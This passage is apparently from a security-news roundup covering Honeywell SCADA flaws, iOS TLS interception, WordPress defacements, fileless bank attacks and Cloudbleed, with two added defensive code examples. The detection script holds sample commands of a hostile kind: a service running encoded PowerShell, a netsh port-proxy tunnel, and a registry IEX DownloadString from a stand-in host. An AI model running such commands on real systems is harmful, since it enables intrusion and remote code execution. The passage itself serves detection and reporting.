a popular web-based SCADA system made by Honeywell that makes it easy to expose passwords and, in turn, give attackers a foothold into the vulnerable network. The flaws exist in some versions of Honeywell’s XL Web II controllers, systems deployed across the critical infrastructure sector, including wastewater, energy, and manufacturing companies. An advisory from the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) warned about the vulnerabilities Thursday. The company has developed a fix, version 3.04.05.05, to address the issues, but users have to call their local Honeywell Building Solutions branch to receive the update, according to the company. The controllers suffer from five vulnerabilities in total, but the scariest one might be the fact that passwords for the controllers are stored in clear text. Furthermore, if attackers wanted to, they could disclose that password simply by accessing a particular URL. An attacker could also carry out a path traversal attack by accessing a specific URL, open and change some parameters by accessing a particular URL, or establish a new user session. The problem with starting a new user session is that the controllers didn’t invalidate any existing session identifier, something that could have made it easier for an attacker to steal any active authenticated sessions. Maxim Rupp, an independent security researcher based in Germany, dug up the bugs and teased them on Twitter at the beginning of January. Rupp has identified bugs in Honeywell equipment before.
Two years ago he discovered a pair of vulnerabilities in Tuxedo Touch, a home automation controller made by the company, that could have let an attacker unlock a house’s doors or modify its climate controls. It’s unclear how widespread the usage of Honeywell’s XL Web II controllers is. While Honeywell is a US-based company, according to ICS-CERT’s advisory the majority of the affected products are used in Europe and the Middle East. When reached on Friday, a spokesperson for Honeywell confirmed that the affected controllers are used in Europe and the Middle East. The company also stressed that the vulnerabilities were patched in September 2016 after they were reported in August.
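Two of the controller weaknesses above, clear-text password storage and a session identifier that survives a new login, are the kind of defect a code review would catch. The following is an added illustration, not Honeywell's code and not from the advisory: a small in-memory authentication store (the class, its method names and the sample user are constructed) that keeps only salted PBKDF2 digests and rotates the session identifier on every successful login, dropping the pre-login identifier so it can never become an authenticated one.

```python
"""Added example (not Honeywell's code): credentials kept as salted hashes rather
than in clear text, and session ids rotated on login so a previously issued id is
invalidated. The store, names and sample user are constructed for illustration."""
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000


class AuthStore:
    def __init__(self):
        self._users = {}     # username -> (salt, pbkdf2 digest); never the password
        self._sessions = {}  # session id -> username, or None before authentication

    def add_user(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        self._users[username] = (salt, digest)

    def verify(self, username: str, password: str) -> bool:
        record = self._users.get(username)
        if record is None:
            # Do the same amount of work for unknown users so response time
            # does not reveal which usernames exist.
            hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, PBKDF2_ROUNDS)
            return False
        salt, digest = record
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        # Constant-time comparison of the two digests.
        return hmac.compare_digest(candidate, digest)

    def start_session(self) -> str:
        """Anonymous session, e.g. for rendering the login page itself."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = None
        return sid

    def login(self, sid: str, username: str, password: str):
        """Authenticate and rotate the session id.

        The pre-login id is discarded, so an identifier that an attacker obtained
        or planted beforehand is never upgraded to an authenticated session.
        Returns the new id, or None if the credentials are wrong."""
        if not self.verify(username, password):
            return None
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = username
        return new_sid

    def is_active(self, sid: str) -> bool:
        return sid in self._sessions

    def session_user(self, sid: str):
        return self._sessions.get(sid)

    def stored_record(self, username: str):
        """Exposed so a reviewer can confirm only salt and digest are stored."""
        return self._users[username]


if __name__ == "__main__":
    store = AuthStore()
    store.add_user("operator", "correct horse")  # constructed sample user
    anon = store.start_session()
    authed = store.login(anon, "operator", "correct horse")
    print("old id still valid:", store.is_active(anon))
    print("new id belongs to:", store.session_user(authed))
```

The design point is that `login` never returns the caller's own identifier: a fresh, unpredictable id is issued and the old one removed from the table in the same step, and the password itself exists only transiently in memory while the digest is computed.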
Will Strafach, CEO of Sudo Security Group, said he found 76 iOS apps that are vulnerable to an attack that can intercept protected data. TLS is used to secure an app’s communication over an internet connection. Without it, a hacker can essentially eavesdrop over a network to spy on whatever data the app sends, such as login information. “This sort of attack can be conducted by any party within Wi-Fi range of your device while it is in use,” Strafach said. “This can be anywhere in public, or even within your home if an attacker can get within close range.” Strafach discovered the vulnerability in the 76 apps by scanning them with his company-developed security service, verify.ly, which he's promoting. It flagged “hundreds of applications” with a high likelihood of data interception. He’s so far confirmed that these 76 apps possess the vulnerability. He did so by running them on an iPhone running iOS 10 and using a proxy to insert an invalid TLS certificate into the connection. Strafach declared that 43 of the apps were either a high or medium risk, because they risked exposing login information and authentication tokens. Some of them are from “banks, medical providers, and other developers of sensitive applications,” he said. He's not disclosing their names, to give them time to patch the problem. The remaining 33 apps were deemed low risks because they revealed only partially sensitive data, such as email addresses. They include the free messaging service ooVoo, video uploaders to Snapchat and lesser-known music streaming services, among many others.
In all, the 76 apps have 18 million downloads, according to app market tracker Apptopia, Strafach said. It’ll be up to the app developers to fix the problem, but it only involves changing a few lines of code, says Strafach, who’s been trying to contact the developers. He included some warnings for developers in the blog post. “Be extremely careful when inserting network-related code and changing application behaviors,” he wrote. “Many issues like this arise from an application developer not fully understanding the code they’ve borrowed from the web.” Users of affected apps can protect themselves by turning off the Wi-Fi when in a public location, Strafach says. That will force the phone to use a cellular connection to the internet, making it much harder for any hacker to eavesdrop unless they use expensive and illegal equipment, Strafach said.
Sucuri, the company that discovered the flaw and responsibly reported it to the WordPress security team, spotted four distinct defacement campaigns in the 48 hours after the existence of the bug was publicly revealed. Three of them have had limited impact, but one – “signed” by someone who goes by “w4l3XzY3” – has resulted in the compromise of 86,000 pages and counting. Sucuri CTO Daniel Cid expects the defacement campaigns to slow down in the coming days, only to be followed by SEO spam (Search Engine Poisoning) attempts. “There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability,” he noted.
Kaspersky Lab researchers have brought to light a series of attacks leveraged against 140+ banks and other businesses around the world. But what makes these attacks unusual is the criminals’ use of widely used legitimate tools and fileless malware, which explains why the attacks went largely unnoticed. “This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC),” the researchers explained. “Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.” Meterpreter is a well-known Metasploit payload that allows attackers to control the screen of a device using VNC and to browse, upload and download files. NETSH (network shell) is a Windows command-line utility that allows local or remote configuration of network devices. The attackers also took advantage of the Windows SC utility to install a malicious service to execute PowerShell scripts, and Mimikatz to extract credentials from compromised machines.
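Because every tool named above is a legitimate Windows or Metasploit component, detection has to key on how they are used rather than on a file hash. The following added example is not Kaspersky's code: it is a small triage filter, written for this page, run over constructed process-creation and registry records. It flags a service whose binary path launches PowerShell (the SC technique), PowerShell started with an encoded command and the decoded script it carries, PowerShell text stored in a registry value, and `netsh interface portproxy add`, which is an assumption on my part about how netsh does the tunnelling the write-up mentions (the article names only the utility). All sample records, hostnames and registry paths are fabricated.

```python
"""Added example (not Kaspersky's): triage of living-off-the-land indicators
named in the write-up over constructed telemetry. Every record below is made up."""
import base64
import re


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode()


def decode_ps(blob: str):
    """Reverse of encode_ps; returns None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob).decode("utf-16le")
    except Exception:
        return None


# PowerShell invoked with -e / -ec / -enc / -EncodedCommand and a base64 argument.
RE_ENC = re.compile(
    r"powershell(?:\.exe)?.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# 'sc create <name> binPath= <command>' -> capture the command the service will run.
RE_SC = re.compile(r"\bsc(?:\.exe)?\s+create\b.*binpath=\s*(.+)", re.I)
# netsh portproxy (assumed tunnelling method; the article names only netsh).
RE_NETSH = re.compile(r"\bnetsh(?:\.exe)?\s+interface\s+portproxy\s+add\b", re.I)
# Text that indicates PowerShell or script download/eval inside an argument or registry value.
RE_PS_TEXT = re.compile(r"powershell|invoke-expression|\bIEX\b|downloadstring", re.I)

# Constructed sample telemetry: (source, text). Nothing here is a real host or key.
ENCODED = encode_ps("IEX (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Example' -Name 'data').data")
SAMPLE_EVENTS = [
    ("process", "C:\\Windows\\System32\\svchost.exe -k netsvcs"),                 # benign
    ("process", 'sc.exe create netsvchelper binPath= "powershell.exe -w hidden -enc ' + ENCODED + '"'),
    ("process", "netsh.exe interface portproxy add v4tov4 listenport=4444 "
                "connectaddress=203.0.113.9 connectport=443"),
    ("process", "netsh.exe interface show interface"),                            # benign netsh
    ("registry", "HKLM\\SOFTWARE\\Example\\data = IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/x')"),
    ("registry", "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive = "
                 "C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"),  # benign
]


def triage(events):
    """Return a list of (technique, detail) findings for the given (source, text) records."""
    findings = []
    for source, text in events:
        if source == "process":
            m = RE_SC.search(text)
            if m and RE_PS_TEXT.search(m.group(1)):
                findings.append(("service_runs_powershell", text))
            if RE_NETSH.search(text):
                findings.append(("netsh_portproxy_tunnel", text))
            m = RE_ENC.search(text)
            if m:
                script = decode_ps(m.group(1))
                # Report the decoded script so an analyst sees what would run.
                findings.append(("encoded_powershell", script if script else m.group(1)))
        elif source == "registry":
            if RE_PS_TEXT.search(text):
                findings.append(("registry_powershell", text))
    return findings


if __name__ == "__main__":
    for technique, detail in triage(SAMPLE_EVENTS):
        print(f"{technique:28s} {detail[:90]}")
```

Decoding the encoded command matters more than flagging it: here the decoded script reads a registry value and evaluates it, which ties the service creation to the registry-resident script the researchers describe, and gives a responder the key to pull rather than just an alert.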
While working on something completely unrelated, Google security researcher Tavis Ormandy recently discovered that Cloudflare was leaking a wide range of sensitive information, which could have included everything from cookies and tokens to credentials. Cloudflare moved quickly to fix things, but their postmortem downplays the risk to customers, Ormandy said. The problem on Cloudflare's side, which impacted big brands like Uber, Fitbit, 1Password, and OKCupid, was a memory leak. The flaw resulted in the exposure of “HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data,” Cloudflare said. About an hour after being alerted by Ormandy, Cloudflare disabled three features on its platform: email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites, as they were using the broken HTML parser chain determined to be the cause of the problem.
Bad as Cloudbleed is, there’s no evidence attackers exploited it before the patch was deployed. But since the vulnerability was triggered more than 1.2m times from 6,500 sites, Cloudflare is taking no chances: the company has tapped an outside company, Veracode, to scour its code. CEO Matthew Prince pledged the external review as he set out a detailed update after 12 days of investigation. That update includes a synopsis of how the vulnerability was created and who faced the most risk. He said Cloudflare continues to work with Google and others to eliminate all leaked data from memory: “We’ve successfully removed more than 80,000 unique cached pages. That underestimates the total number because we’ve requested search engines purge and re-crawl entire sites in some instances.” Cloudbleed is a serious vulnerability in Cloudflare’s internet infrastructure that Google Project Zero researcher Tavis Ormandy discovered in mid-February. It turned out that a single character in Cloudflare’s code caused the problem. In its initial blog post on the matter, Cloudflare said the issue stemmed from its decision to use a new HTML parser called cf-html. In his update, Prince said Cloudbleed was triggered when a page with two characteristics was requested through Cloudflare’s network